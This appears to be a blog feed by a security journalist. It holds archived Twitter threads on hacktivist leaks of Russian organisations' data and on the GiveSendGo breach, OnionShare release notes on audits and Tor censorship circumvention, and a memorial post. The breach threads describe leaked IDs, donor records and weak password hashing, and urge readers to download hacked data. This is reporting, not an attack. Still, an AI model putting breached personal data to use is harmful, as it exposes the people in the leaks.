<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">8. By 2020, requests from connected actors to delete tweets were routine. One executive would write to another: “More to review from the Biden team.” The reply would come back: “Handled.” <a href="https://t.co/mnv0YZI4af">pic.twitter.com/mnv0YZI4af</a></p>— Matt Taibbi (@mtaibbi) <a href="https://twitter.com/mtaibbi/status/1598827602403160064?ref_src=twsrc%5Etfw">December 2, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p><em>Posted 4:46 PM · Dec 2, 2022, 108 Retweets, 799 Likes</em></p>
<hr>
<p>I would love it if all of Twitter's internal emails were exposed so that we could see the lengths they took to suppress the 2020 Black Lives Matter protests instead of just the stuff conservatives are cherry-picking</p>
<p><em>Posted 5:21 PM · Dec 2, 2022, 621 Retweets, 3,999 Likes</em></p>
<hr>
<p>Or how Twitter bent over backwards to keep Trump's account online despite many, many instances of hate speech, inciting violence, and otherwise violating Twitter's rules</p>
<p><em>Posted 5:22 PM · Dec 2, 2022, 198 Retweets, 1,995 Likes</em></p>
<hr>
<p>It's so annoying how slowly @mtaibbi is tweeting this thread out. THE TWITTER FILES has no files, just tons of tweets posted 20 minutes apart? Like, why isn't this just an article? Did @elonmusk put you up to this?</p>
<p><em>Posted 5:33 PM · Dec 2, 2022, 63 Retweets, 980 Likes</em></p>
<hr>
<p>Anyway, Twitter sucks. Mastodon is fun and way less toxic, if you can make it past the initial usability hurdle. But it's worth it. I can't wait until this site burns down. I'm mostly posting there now <a href="https://infosec.exchange/@micahflee">https://infosec.exchange/@micahflee</a></p>
<p><em>Posted 5:51 PM · Dec 2, 2022, 23 Retweets, 405 Likes</em></p>
OnionShare 2.6 has a quickstart screen, automatic censorship circumvention, and better packaging2022-10-09T00:00:00ZMicah Leeurn:uuid:c3ad5c39-17c3-38bd-bb4e-b97f9a0c5535<p>I'm excited to announce that the OnionShare team just released version 2.6! You can download it from <a href="https://onionshare.org/">onionshare.org</a>. Here are the main things that are new.</p>
<h1 id="quickstart-screen">Quickstart screen</h1><p>When you opened OnionShare it used to immediately try connecting to Tor, and if the connection failed, or if you canceled it, it would <em>then</em> let you adjust your Tor settings. We've now introduced a "quickstart" screen which lets you choose to change your Tor settings before it tries to connect if you'd like to. (And it also has an awesome rocket ship launching animation.)</p>
<p>This is important when it comes to internet censorship. OnionShare keeps its users anonymous by using Tor. Because Tor is a common way to bypass censorship, networks that block part of the internet also often block Tor. There are even entire countries, like Russia, Iran, and China, that try to block Tor. If you're in one of those countries and you open OnionShare, it's better that your computer doesn't automatically connect to a Tor node IP address, instead giving you a chance to change your Tor settings to bypass censorship, like by using a <a href="https://tb-manual.torproject.org/bridges/">Tor bridge</a>, before you connect.</p>
<h1 id="automatic-censorship-circumvention">Automatic censorship circumvention</h1><p>Bypassing censorship sounds complicated, but with Tor it's actually pretty easy, and this release of OnionShare makes it even simpler. If you try connecting to Tor and it fails because of internet censorship, OnionShare will then let you try to automatically bypass it. You just click a button and OnionShare will automatically figure out the best way to bypass the censorship that you're currently facing, and then connect to Tor. That's it.</p>
<p>Behind the scenes, OnionShare uses the Tor Project's new distribution system for bridges called <a href="https://gitlab.torproject.org/tpo/anti-censorship/rdsys">rdsys</a>, or the "censorship API". Using a technique called domain fronting, OnionShare makes a connection to rdsys that's disguised as an innocuous request to a major CDN, the kind that you make thousands of times a day as you use the web, asking for ideal settings. Based on the country that you're connecting from, the rdsys server makes its best guess at what your Tor settings should be to bypass censorship. It might tell you to connect using an obfs4proxy bridge, and provide you with IP addresses for some bridges that aren't blocked in your country; or it might tell you to connect using <a href="https://snowflake.torproject.org/">Snowflake</a>. The Tor Project keeps its rdsys database updated based on the current state of internet censorship.</p>
<p>Late last year, <a href="https://ooni.org/post/2021-russia-blocks-tor/">Russia started blocking Tor</a>. While we were developing this feature we had a friend in Russia test it for us. They went to a public wifi network and opened an early build of OnionShare. They tried connecting to Tor, which failed because it was blocked, and then tried automatically bypassing it, and it succeeded. This should make bypassing censorship much simpler for OnionShare users.</p>
<h1 id="better-packaging">Better packaging</h1><p>Finally, this release includes a lot of new work going into automating packaging. OnionShare is now available for these platforms:</p>
<ul>
<li>Windows (64-bit)</li>
<li>Windows (32-bit)</li>
<li>macOS (Intel, but it runs on Apple Silicon and some day we'll support it natively)</li>
<li>Linux: <a href="https://flathub.org/apps/details/org.onionshare.OnionShare">Flatpak</a> (x86_64 and arm64)</li>
<li>Linux: <a href="https://snapcraft.io/onionshare">Snapcraft</a> (amd64, arm64, and armhf)</li>
</ul>
<p>I'm particularly excited about the Snapcraft work because this makes it much simpler to install on ARM-based Linux systems, such as <a href="https://micahflee.com/2021/02/onionshare-anonymous-dropbox-raspberry-pi/">Raspberry Pis</a>. All you have to do, after <a href="https://snapcraft.io/docs/installing-snap-on-raspbian">installing Snap</a>, is run: <code>sudo snap install onionshare</code>. Then you can run the command line version of OnionShare with <code>onionshare.cli</code>.</p>
<p>The new Snapcraft packaging also automatically builds and pushes changes to the Snapcraft edge channel. So if you want to try the very latest version of OnionShare, basically the code in the main branch <a href="https://github.com/onionshare/onionshare">on github</a>, you can install that by running: <code>sudo snap install onionshare --edge</code>.</p>
Stories about Peter Eckersley2022-09-04T00:00:00ZMicah Leeurn:uuid:4a928436-905f-3d24-9d47-66e016307c8c<p>My friend Peter Eckersley tragically and unexpectedly died on Friday. I hadn't spent much time with him in the last few years, but I wish that I had because he had such a big impact on my life. Wikipedians have created an <a href="https://en.wikipedia.org/wiki/Peter_Eckersley_%28computer_scientist%29">article about Peter</a>, and Seth Schoen, who worked closely with me and Peter at EFF on the tech team, wrote a <a href="https://community.letsencrypt.org/t/peter-eckersley-may-his-memory-be-a-blessing/183854">memorial for him</a> on the Let's Encrypt forum. I thought I would share a few stories about Peter here.</p>
<p>We worked together at EFF for years, and for most of that time he was my manager. Peter encouraged me to switch career paths from being a web developer, where I wrote lots of PHP code to maintain EFF's Drupal website and instance of CiviCRM, to a staff technologist. As a technologist I took over the <a href="https://www.eff.org/https-everywhere">HTTPS Everywhere</a> project, which Peter initially developed, and I got to do cool things like explain how HTTPS worked to journalists who were suddenly interested because of the Snowden revelations. (I had so many conversations with Peter about HTTPS and encrypting the web. The real problem wasn't something HTTPS Everywhere, which rewrote URLs from HTTP to HTTPS, could solve. The problem was the fact that the certificate authority cartel created an expensive barrier to entry to allow websites to have basic security. This is why he cofounded <a href="https://letsencrypt.org/">Let's Encrypt</a>, to remove the ridiculous cost burden and make the web more secure and private. And it worked.)</p>
<p>While working in EFF's office in the Mission district of San Francisco, we would regularly take breaks to get coffee at one of the many incredible coffee shops that were an easy walk or bike ride away. Peter loved espresso drinks, and I also learned about his excellent policy regarding them: He would always take the time to enjoy his coffee, even if he was in a hurry. The negligible efficiency gain of getting coffee to go and walking it back to the office just isn't worth it compared to spending five minutes to sit down and savor your cappuccino.</p>
<p>Peter taught me what entropy is (in the information theory sense of the term), and really about the field of information theory itself. I knew that password managers measured the strength of passwords in entropy, and that you can increase the entropy of your diceware passphrases by increasing the number of words, but I didn't really get it until he explained it to me. I loved this 2010 blog post he wrote called <a href="https://www.eff.org/deeplinks/2010/01/primer-information-theory-and-privacy">A Primer on Information Theory and Privacy</a> which measured the number of bits of entropy it takes to uniquely identify someone. This was part of Peter's groundbreaking research in web browser fingerprinting, and the <a href="https://coveryourtracks.eff.org/">Panopticlick project</a> (since renamed to Cover Your Tracks).</p>
<p>Peter was an avid road bicyclist. We rode bikes all over San Francisco. Once, when we were both in Amsterdam (I think this was just after the outdoor hacker conference <a href="https://en.wikipedia.org/wiki/Observe._Hack._Make.">Observe. Hack. Make.</a> in 2013) he had actually brought his fancy road bike to Europe with him, because he was planning on bike touring around afterwards. I had rented one of those cheap cruisers that are ubiquitous in Amsterdam. I remember we were near Centraal Station, surrounded by hundreds of bicyclists, and Peter was the only one wearing a helmet, which he had brought with him. Should he not wear his helmet, since no one else was? But he decided to wear it regardless of what everyone else was doing. "That's not why I wear a helmet," he said.</p>
<p>After I married my wife Crystal in 2012 (I'm really glad that Peter was able to travel across the country to attend my wedding), we were both in something like $20,000 of credit card debt that seemed impossible to ever pay off. Peter had savings and hated the corrupt finance industry, and so he lent us $20k at an incredibly low interest rate. We immediately paid off all of our credit card debt, and then paid him back. Without Peter it would have taken us years longer to get out of debt. I also had a really low salary at EFF when I first started ($55k, though it was higher pay than I'd ever had before). Peter helped encourage me and prepare me to ask for a raise, the first time I had ever done so--and my salary went up to something like $75k.</p>
<p>Peter never made a Twitter account, but he kind of wanted one. The one thing stopping him was the username: @pde was already taken, and he decided he didn't want to make an account unless he could get the same three-letter username he used everywhere else.</p>
<p>Just as Peter was an espresso connoisseur, he was also a cocktail connoisseur. I'd never actually met anyone who was as knowledgeable about cocktails as Peter before, and he really made me understand why someone would spend $15 on one (I don't drink all that much). Cocktails can be like entrees at a fancy restaurant. I remember I was at a bar with him when he described, in intricate detail, what goes into a Manhattan. "After the whiskey, you add in the vermouth, which actually makes it <em>less</em> alcoholic, since vermouth has 15% alcohol and the whiskey has 40%."</p>
<p>Peter encouraged me to get better at programming in Python. Now it's my favorite language. When I was a teenager I first taught myself C++ and Perl and then quickly moved onto PHP/MySQL. For many years, as a web developer, I only programmed in PHP and JavaScript. When I started at EFF I knew a little Python (if you're proficient in one programming language you know a little of all of the rest) but PHP was still my go-to language. If a bash script I was writing started to get gnarly, I'd rewrite it in PHP. But Peter told me about how wonderful Python is at things like this compared to PHP. And how it was getting more popular and came pre-installed in every single Linux distro. He was right, Python is so much nicer than PHP, and a better tool for scripting. Since then I've programmed quite a lot of software in Python: Tor Browser Launcher, OnionShare, Dangerzone, and Semiphemeral. I'm writing a <a href="https://nostarch.com/hacks-leaks-and-revelations">book</a> right now that, among other things, teaches journalists and researchers to program in Python.</p>
<p>If you work at EFF for long enough you get a 2-month paid sabbatical. Right before Peter took his, a mysterious structure appeared on the roof of EFF's office (this time in the Tenderloin, EFF had moved from the Mission). It was a gazebo that was surprisingly large. We had staff meetings where the executive director was asking everyone wtf was up with it and why it was on the roof (apparently, you need permits from the city to add structures to the roof of your building in San Francisco). It turns out, Peter and some friends from Burning Man had built it there, I think maybe in the middle of the night, just before he left town for his sabbatical, lol.</p>
<p>Once, I was traveling to Tunisia for a post-Arab Spring internet freedom event with Peter. I don't exactly remember the itinerary, but I think we were flying from SFO to Spain, and then on to Tunis, but our flight to Europe showed up hours late and there was only one flight to Tunis from that airport each day. The only way to get there the same night would be to fly to Paris, and then much later in the night transfer to a flight to Tunis. So we went to Paris, and since we had like 6 hours before our flight we left the airport to explore--this is the only time I've ever been to Paris, or to anywhere in France. We visited Notre-Dame, and that bridge that lovers attach locks to, and we ate at a French restaurant. To my surprise, I learned that Peter was entirely fluent in French and could just talk to everyone. This also helped in Tunisia, where people mostly speak Arabic, French, and a little English.</p>
<p>He wasn't just fluent in French. He also <em>triple-majored</em> in college. He had three undergraduate degrees in physics, math, and computer science, and also a PhD in computer science and law--his dissertation was about copyright and piracy. Peter really helped Crystal, my wife, who never finished high school and was just learning early math in community college (now she has a BS in physics and is an applied math grad student), realize that STEM was a possibility for her.</p>
<p>Peter was good friends with Aaron Swartz, and they used to be roommates. After Aaron was indicted for bullshit Computer Fraud and Abuse Act charges, Peter dropped everything to organize an activism campaign at EFF in his defense. I never met Aaron myself, but I rushed to build an activism campaign website to collect signatures to send to Congress. But we never launched it, because Aaron committed suicide first. Peter, and the rest of EFF, then pushed for <a href="https://www.eff.org/deeplinks/2013/06/aarons-law-introduced-now-time-reform-cfaa">Aaron's Law</a>, a bill to reform the CFAA, a goal that EFF <a href="https://www.eff.org/deeplinks/2022/05/dojs-new-cfaa-policy-good-start-does-not-go-far-enough-protect-security">still fights for</a>.</p>
<p>I miss Peter. He was just 43 years old when he died, a huge loss for the internet and the world.</p>
<p>I took the photo of Peter at the top of this blog post on a rooftop in Tunis, Tunisia, in 2012. It's licensed Attribution 4.0 International (CC BY 4.0).</p>
<p>--</p>
<p><strong>Update September 7, 2022</strong>: Last night, at Peter's beautiful memorial in San Francisco, I learned that he actually did create a Twitter account in 2015 with the username <a href="https://twitter.com/pde33">@pde33</a> -- and I was surprised to find that I'm actually following him on Twitter! I must have forgotten. He posted the most interesting things about artificial intelligence.</p>
<p><blockquote class="twitter-tweet"><p lang="en" dir="ltr">So generative models dream up objects like this at the drop of a whimsical hat. Perhaps one day there will be a way to make them, so that our world is filled with such things? <a href="https://t.co/wL9xLU2IDS">pic.twitter.com/wL9xLU2IDS</a></p>— Peter Eckersley (@pde33) <a href="https://twitter.com/pde33/status/1541880345393451008?ref_src=twsrc%5Etfw">June 28, 2022</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
Twitter Thread: For first time in internet history Russia is fair game for cyber attacks, and this is what it looks like2022-04-19T00:00:00ZMicah Leeurn:uuid:02b47060-b176-33fc-959c-7a1619c60b02<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1516521193808875527">https://twitter.com/micahflee/status/1516521193808875527</a></p>
<hr>
<p>I don't think people fully appreciate just how much, after invading Ukraine, people are hacking Russia. There are multiple hacks a week and it's only increasing. For first time in internet history Russia is fair game for cyber attacks, and this is what it looks like 🧵</p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 9,402 Retweets, 39.8K Likes</em></p>
<hr>
<p>Distributed Denial of Secrets has been archiving these dumps and making them torrents. DDoSecrets has been around for a few years but made a big splash in 2020, during BLM protests by publishing hacked data on hundreds of US local/federal police sites <a href="https://theintercept.com/2020/08/17/blueleaks-california-ncric-black-lives-matter-protesters/">https://theintercept.com/2020/08/17/blueleaks-california-ncric-black-lives-matter-protesters/</a></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 628 Retweets, 4,574 Likes</em></p>
<hr>
<p>Twitter permanently banned the @DDoSecrets account then, and also took the extraordinary step of banning links to ddosecrets dot com itself. Go ahead and try tweeting that URL, it won't work. Anyway, DDoSecrets has 7 Russian datasets from March and another 20 from April (so far)</p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 596 Retweets, 4,369 Likes</em></p>
<hr>
<ul>
<li>817gb from Roskomnadzor, agency that monitors and censors mass media (!)</li>
<li>79gb from Transneft, world's largest oil pipeline company, state-controlled</li>
<li>15gb from Rosatom, the state nuclear energy agency and major exporter of uranium</li>
<li>2.4gb from RostProekt, a construction company</li>
</ul>
<p><img src="image1.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 521 Retweets, 3,994 Likes</em></p>
<hr>
<ul>
<li>110gb from MashOil, manufacturer for drilling, mining, and fracking industries</li>
<li>22gb from the Central Bank of Russia</li>
<li>5.9gb from Thoriz Corp, investment firm owned by an oligarch billionaire</li>
<li>52gb from Marathon Group, another investment firm owned by another oligarch</li>
</ul>
<p><img src="image2.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 384 Retweets, 3,297 Likes</em></p>
<hr>
<ul>
<li>15gb from the Russian Orthodox Church's charitable wing</li>
<li>65gb from Central Legal Services, mostly emails</li>
<li>483gb from Mosekspertiza, state-owned firm</li>
<li>786gb from VGTRK, state-owned broadcaster that runs dozens of TV/radio stations (!)</li>
<li>244gb from Petrofort</li>
</ul>
<p><img src="image3.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 365 Retweets, 3,153 Likes</em></p>
<hr>
<ul>
<li>145gb from Aerogas, oil and gas industry</li>
<li>35gb from Forest, logging firm</li>
<li>116gb from Tver Governor's office, appointed by Putin</li>
<li>150gb from the city of Blagoveshchensk</li>
</ul>
<p><img src="image4.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 302 Retweets, 2,800 Likes</em></p>
<hr>
<p>Whew... there's still a lot more. It's going to take months and years to look through all of this data. It's hard to picture how this will affect Russia going forward. It's massive.</p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 380 Retweets, 3,768 Likes</em></p>
<hr>
<ul>
<li>446gb from the Ministry of Culture (!)</li>
<li>221gb from the education department of Strezhevoy</li>
<li>440gb from Technotec, oil and gas industry</li>
<li>726gb from Gazprom, oil and gas manufacturer</li>
<li>400gb from Continent Express, travel agency</li>
</ul>
<p><img src="image5.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 319 Retweets, 2,902 Likes</em></p>
<hr>
<ul>
<li>222gb from Gazregion, construction company that does gas pipelines (hacked by 3 different hacktivists at the same time lol)</li>
<li>107gb from Neocom Geoservice, oil, gas, and drilling engineering</li>
</ul>
<p><img src="image6.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 272 Retweets, 2,643 Likes</em></p>
<hr>
<ul>
<li>1.2gb from Synesis Surveillance System</li>
<li>9.5gb from General Dept of Troops and Civil Construction (works with ministry of defense)</li>
<li>160gb from Tendertech, financial and banking processing firm</li>
</ul>
<p><img src="image7.png" alt=""></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 263 Retweets, 2,490 Likes</em></p>
<hr>
<p>Those last four datasets: those were from TODAY. I know there are several more in the DDoSecrets backlog as well. It's insane.</p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 245 Retweets, 3,241 Likes</em></p>
<hr>
<p>This isn't all that DDoSecrets does at all. It's just been particularly slammed by hacktivism against Russia since the illegal invasion of Ukraine. Here's a great overview from @illegaldaydream, a member of the collective <a href="https://backdrifting.net/post/057_what_is_ddosecrets">https://backdrifting.net/post/057_what_is_ddosecrets</a></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 452 Retweets, 2,954 Likes</em></p>
<hr>
<p>After January 6, DDoSecrets published 5gb of hacked data from the Oath Keeper militia and shared it privately with journalists, which triggered dozens of investigations around the country <a href="https://www.npr.org/2021/11/05/1052098059/active-duty-police-in-major-u-s-cities-appear-on-purported-oath-keepers-rosters">https://www.npr.org/2021/11/05/1052098059/active-duty-police-in-major-u-s-cities-appear-on-purported-oath-keepers-rosters</a></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 751 Retweets, 4,409 Likes</em></p>
<hr>
<p>During the far right anti-vax Canadian "Freedom Convoy", a hacktivist hacked the far right fundraising site GiveSendGo and leaked all their data to DDoSecrets, which shared with journalists. This also triggered dozens of news articles <a href="https://theintercept.com/2022/02/17/freedom-convoy-givesendgo-canada-oath-keepers-funding/">https://theintercept.com/2022/02/17/freedom-convoy-givesendgo-canada-oath-keepers-funding/</a></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 516 Retweets, 3,603 Likes</em></p>
<hr>
<p>Even since Russia's war against Ukraine started, DDoSecrets published 4TB of data from "Mining Secrets", a major collaboration of 65 journalists and 20 newsrooms <a href="https://forbiddenstories.org/case/mining-secrets/">https://forbiddenstories.org/case/mining-secrets/</a></p>
<p><em>Posted 1:56 PM · Apr 19, 2022, 455 Retweets, 3,000 Likes</em></p>
<hr>
<p>Anyway, I've been working on downloading as much of the hacked Russian data as I can and making it searchable for Russian-speaking journalists. If you have the time and tech skills, you should too! The data is available to everyone</p>
<p><em>Posted 1:57 PM · Apr 19, 2022, 498 Retweets, 3,395 Likes</em></p>
<hr>
<p>And if you want to support DDoSecrets, go to ddosecrets dot com and click "Donate" on the left. The collective works on a shoestring budget, doesn't get paid, and spends very little time fundraising because they're too busy with everyone hacking Russia</p>
<p><img src="image8.jpg" alt=""></p>
<p><em>Posted 1:57 PM · Apr 19, 2022, 477 Retweets, 3,024 Likes</em></p>
<hr>
<p>TODAY DDoSecrets released two new hacked Russian datasets:</p>
<ul>
<li>130gb from Worldwide Invest, investment firm</li>
<li>432gb from Sawatzky, property management firm with lots of big clients</li>
</ul>
<p><img src="image9.png" alt=""></p>
<p><em>Posted 3:18 PM · Apr 20, 2022, 79 Retweets, 532 Likes</em></p>
<hr>
<p>The section on the DDoSecrets Wikipedia page for its 2022 releases is woefully out of date, if anyone wants to improve it <a href="https://en.wikipedia.org/wiki/Distributed_Denial_of_Secrets">https://en.wikipedia.org/wiki/Distributed_Denial_of_Secrets</a></p>
<p><em>Posted 5:02 PM · Apr 20, 2022, 47 Retweets, 363 Likes</em></p>
<hr>
<p>Another release today:</p>
<ul>
<li>211gb from Accent Capital, a commercial real-estate investment firm</li>
</ul>
<p><img src="image10.png" alt=""></p>
<p><em>Posted 11:10 AM · Apr 21, 2022, 9 Retweets, 121 Likes</em></p>
<hr>
<p>I wrote an article about how hacktivists are bombarding Russia with an unprecedented onslaught of cyberattacks <a href="https://theintercept.com/2022/04/22/russia-hackers-leaked-data-ukraine-war/">https://theintercept.com/2022/04/22/russia-hackers-leaked-data-ukraine-war/</a></p>
<p><em>Posted 1:43 PM · Apr 22, 2022, 31 Retweets, 96 Likes</em></p>
<hr>
<p>Another day, another few hundred gigs of hacked emails from a Russian company. Today DDoSecrets published 432gb of data from Enerpred, the largest producer of hydraulic tools in Russia that works in energy, petrochemical, coal, gas and construction</p>
<p><img src="image11.png" alt=""></p>
<p><em>Posted 1:50 PM · Apr 22, 2022, 6 Retweets, 59 Likes</em></p>
<hr>
<p>1.1 terabytes (!) of email from ALET / АЛЕТ, a customs broker for companies in the fuel and energy industries, handling exports and customs declarations for coal, crude oil, liquefied gases and petroleum products</p>
<p><img src="image12.png" alt=""></p>
<p><em>Posted 10:17 AM · Apr 25, 2022, 3 Retweets, 39 Likes</em></p>
<hr>
<p>More hacks in the last few days:</p>
<ul>
<li>554gb of data from Petersburg Social Commercial Bank</li>
<li>1.7tb (terabytes!) from Elektrocentromontazh, Russia's primary electricity utility</li>
</ul>
<p><img src="image13.png" alt=""></p>
<p><em>Posted 5:02 PM · Apr 29, 2022, 6 Retweets, 20 Likes</em></p>
<hr>
<p>The first hacked Russian dataset in May: 20gb of data from LLC Capital, a Russian accounting firm</p>
<p><img src="image14.png" alt=""></p>
<p><em>Posted 3:04 PM · May 4, 2022, 5 Retweets, 14 Likes</em></p>
Twitter Thread: "Freedom Convoy" and the GiveSendGo hacks2022-02-15T00:00:00ZMicah Leeurn:uuid:6cdded8d-23fe-39eb-873f-1ff8b852d11f<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1493654096078721027">https://twitter.com/micahflee/status/1493654096078721027</a></p>
<hr>
<p>Donation site used by Freedom Convoy suffers 3rd data leak in two weeks. The new hack includes "a full 2.5 GB MySQL database dump, source code for their Bitbucket repo, information from their customer service systems" and limited credit card data <a href="https://www.dailydot.com/debug/givesendgo-trucker-convoy-hack-leak/">https://www.dailydot.com/debug/givesendgo-trucker-convoy-hack-leak/</a></p>
<p><em>Posted 10:31 AM · Feb 15, 2022, 203 Retweets, 470 Likes</em></p>
<hr>
<p>I'm starting to look at the latest GiveSendGo leak. The MySQL dump, called gsg_prod_v4_20220211.sql, appears to be a complete dump of their production database. It includes the entire donor history of everyone who's donated to any campaign before February 11, last Friday</p>
<p><img src="image1.png" alt=""></p>
<p><em>Posted 2:46 PM · Feb 15, 2022, 68 Retweets, 204 Likes</em></p>
<hr>
<p>The tbl_users table has 170,944 rows -- this is probably everyone who has made an account on GiveSendGo... and everyone's passwords are hashed with md5, though at least they're salted</p>
<p><em>Posted 2:48 PM · Feb 15, 2022, 20 Retweets, 126 Likes</em></p>
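<p>As an aside, the salted-MD5 scheme mentioned above looks roughly like the following sketch (a toy illustration with a made-up salt format, not GiveSendGo's actual code). Salting defeats precomputed lookup tables, but MD5 is so fast that a dictionary attack against each individual hash remains cheap:</p>

```python
import hashlib
import os

def hash_password(password, salt=None):
    # Hypothetical scheme: digest = md5(salt + password), with the
    # salt stored alongside the digest. Salting blocks rainbow tables,
    # but MD5's speed still makes per-hash dictionary attacks easy.
    salt = salt if salt is not None else os.urandom(8).hex()
    return salt, hashlib.md5((salt + password).encode()).hexdigest()

def verify(password, salt, digest):
    return hashlib.md5((salt + password).encode()).hexdigest() == digest

salt, digest = hash_password("hunter2")
print(verify("hunter2", salt, digest))      # True
print(verify("wrong-guess", salt, digest))  # False
```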
<hr>
<p>Here are the campaigns that brought in the most money.</p>
<ul>
<li>#1: Freedom Convoy 2022</li>
<li>#2: Abbichuu Gypsum Board Company (???)</li>
<li>#3: Adopt a trucker (another Freedom Convoy one)</li>
<li>#4: Voter Integrity Project</li>
<li>#5: Kyle Rittenhouse Legal Defense</li>
</ul>
<p><img src="image2.jpg" alt=""></p>
<p><em>Posted 2:58 PM · Feb 15, 2022, 59 Retweets, 152 Likes</em></p>
<hr>
<p>Here are the campaigns that have attracted most individual donors:</p>
<ul>
<li>#1: Freedom Convoy 2022</li>
<li>#2: Kyle Rittenhouse Legal Defense</li>
<li>#3: Support COVID19 Federal Whistleblower Jodi Omalley</li>
<li>#4: Facebook Whistleblower Support Fund Morgan Kahmann</li>
<li>#5: Pfizer Whistleblower Melissa</li>
</ul>
<p><img src="image3.jpg" alt=""></p>
<p><em>Posted 3:01 PM · Feb 15, 2022, 43 Retweets, 129 Likes</em></p>
<hr>
<p>This leak also contains about 3GB of images of identification docs, about 1,400 of them, I believe from people who run campaigns. Here's a random sampling</p>
<p><img src="image4a.jpg" alt="">
<img src="image4b.jpg" alt="">
<img src="image4c.png" alt="">
<img src="image4d.jpg" alt=""></p>
<p><em>Posted 3:27 PM · Feb 15, 2022, 49 Retweets, 154 Likes</em></p>
<hr>
<p>There's also a TON of Stripe data. Like, type of CC, last 4 digits, billing address, etc. This is from an interesting summary.txt from Stripe, specifically for the Freedom Convoy 2022 campaign</p>
<p><img src="image5.png" alt="">
<img src="image6.jpg" alt=""></p>
<p><em>Posted 3:34 PM · Feb 15, 2022, 28 Retweets, 114 Likes</em></p>
<hr>
<p>Oh and those unredacted (I did the redaction above) photos of gov issued IDs? The hacker included the script they used to download them all using curl, over Tor, without any authentication.</p>
<p>When @MikaelThalen told GiveSendGo about this issue they called it "fake news"</p>
<p><img src="image7.png" alt="">
<img src="image8.png" alt=""></p>
<p><em>Posted 3:51 PM · Feb 15, 2022, 36 Retweets, 181 Likes</em></p>
<hr>
<p>The death threats have started and I haven't even published my article yet</p>
<p><img src="image9.png" alt=""></p>
<p><em>Posted 3:32 PM · Feb 16, 2022, 7 Retweets, 56 Likes</em></p>
<hr>
<p>Because the GiveSendGo dataset is full of private info it isn't available to the public. DDoSecrets is only distributing it to journalists and researchers. If you'd like to request access, email info@ddosecrets.com</p>
<p><em>Posted 3:45 PM · Feb 16, 2022, 6 Retweets, 44 Likes</em></p>
<hr>
<p>Just published my first article based on the GiveSendGo dataset: Oath Keepers, anti-democracy activists, and others on the far right are funding Canada’s “Freedom Convoy” <a href="https://theintercept.com/2022/02/17/freedom-convoy-givesendgo-canada-oath-keepers-funding/">https://theintercept.com/2022/02/17/freedom-convoy-givesendgo-canada-oath-keepers-funding/</a></p>
<p><em>Posted 10:33 AM · Feb 17, 2022, 28 Retweets, 62 Likes</em></p>
OnionShare 2.5 fixes security issues and adds censorship circumvention features2022-01-17T00:00:00ZMicah Leeurn:uuid:dd84ce5b-c5a0-345f-bd1f-0dbfbd81acf3<p>The OnionShare team has just released OnionShare 2.5! This version fixes security vulnerabilities uncovered in our first comprehensive security audit, and also includes improved censorship circumvention features. Download it from <a href="https://onionshare.org">onionshare.org</a>.</p>
<h1 id="onionshare-s-first-security-audit">OnionShare's first security audit</h1><p>Late last year, the OnionShare project was lucky enough to get a comprehensive security audit from the non-profit penetration testing group <a href="https://www.radicallyopensecurity.com/">Radically Open Security</a>. This work was funded by Open Technology Fund's <a href="https://www.opentech.fund/labs/red-team-lab/">Red Team Lab</a>.</p>
<p>Fortunately, ROS didn't find any issues with a threat level of <em>critical</em> or <em>high</em>, but they found 2 that were <em>elevated</em>, 3 that were <em>moderate</em>, and 4 that were <em>low</em>. All vulnerabilities have been fixed in version 2.5.</p>
<p>From the report:</p>
<blockquote><p>The penetration test goals were the de-anonymization of users and code execution on any of the involved parties, which was not found possible in the time allocated for the engagement. This is most likely due to the choice of offloading the client interaction and authentication fully on the Tor-browser and relying on the security assumptions of a recent and well maintained browser. Additionally, the usage of stable third party libraries for file and network handling, as well as the separation of logic and user interface exposed only a minimal attack surface. User-controlled input is minimal and in most cases sanitized or validated.</p>
<p>...</p>
<p>Our general impression is that the Onionshare project has no major security vulnerabilities and can be used within the properly documented boundaries. Sane default configurations were chosen and inexperienced users are warned about the consequences of sensitive configuration changes.</p>
</blockquote>
<p>Check out the <a href="https://raw.githubusercontent.com/onionshare/onionshare/develop/security/2021%20Penetration%20Test%20Report.pdf">full penetration test report</a>, which I summarize at the end of this post.</p>
<h1 id="improved-censorship-circumvention">Improved censorship circumvention</h1><p>It's becoming alarmingly more common to see hostile governments pressure internet providers to block access to the Tor network. For example, in December, several <a href="https://ooni.org/post/2021-russia-blocks-tor/">Russian ISPs started blocking Tor as well as censoring access to torproject.org</a>. Because OnionShare relies on Tor, this means that Russia is preventing people from using OnionShare as well.</p>
<p>This update greatly improves our support for <em>bridges</em>, which let people quickly and easily circumvent this sort of censorship. A bridge is a Tor server, generally with a secret IP address so it's harder to block, that just forwards traffic onto the Tor network for people. So if you live in Moscow and you can't connect to Tor because your ISP is blocking the IP addresses of public Tor nodes, you can configure OnionShare (or Tor Browser) to use a bridge. This way you'll connect to an IP address that isn't blocked, thus bypassing the censorship.</p>
<p>OnionShare has supported bridges for some time, but one of the coolest features of this release is the ability to automatically fetch bridges from the <a href="https://bridges.torproject.org/">BridgeDB service</a> directly from the settings tab.</p>
